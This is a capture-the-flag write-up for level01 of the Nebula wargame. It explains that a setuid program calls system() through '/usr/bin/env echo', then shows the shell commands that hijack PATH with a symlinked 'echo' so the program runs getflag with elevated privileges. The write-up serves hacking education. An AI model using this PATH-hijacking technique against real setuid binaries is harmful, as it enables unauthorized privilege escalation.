In level01 of Nebula wargame, we are required to find a vulnerability that allows us to run arbitrary programs. The source code of flag01 is provided:

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

#include <sys/types.h>

#include <stdio.h>

int main(int argc, char **argv, char **envp)

{

gid_t gid;

uid_t uid;

gid = getegid();

uid = geteuid();

setresgid(gid, gid, gid);

setresuid(uid, uid, uid);

system("/usr/bin/env echo and now what?");

}

The system() library call executes echo “and now what?”

level01@nebula:~$ ../flag01/flag01
and now what?

but instead of directly running /bin/echo, it uses /usr/bin/env to find the location of echo. Ever came across scripts starting with #!/usr/bin/env python ? This is used for portability issues, as fixing a path (such as /usr/bin/python) wouldn’t work when the Python interpreter is installed in a different location. How does env look for the specified program ? it simply searches in the directories specified in the PATH environment variable starting from the the first directory, and going through the directories in $PATH until it finds the looked-for program.

level01@nebula:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games 

How to attack this program ? We will prepend to $PATH a directory in which we will add a symbolic link echo pointing to /bin/getflag.
First we prepend /home/level01 to $PATH

level01@nebula:~$ export PATH=/home/level01/:$PATH

level01@nebula:~$ echo $PATH
/home/level01/:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

Now we create a symbolic link /home/level01/echo to /bin/getflag

level01@nebula:~$ ln -s /bin/getflag echo

level01@nebula:~$ ls -l echo
lrwxrwxrwx 1 level01 level01 12 2012-10-28 12:32 echo -> /bin/getflag

Now flag01 will run our own /home/level01/echo that is simply a symbolic link to /bin/getflag.

level01@nebula:~$ ../flag01/flag01
You have successfully executed getflag on a target account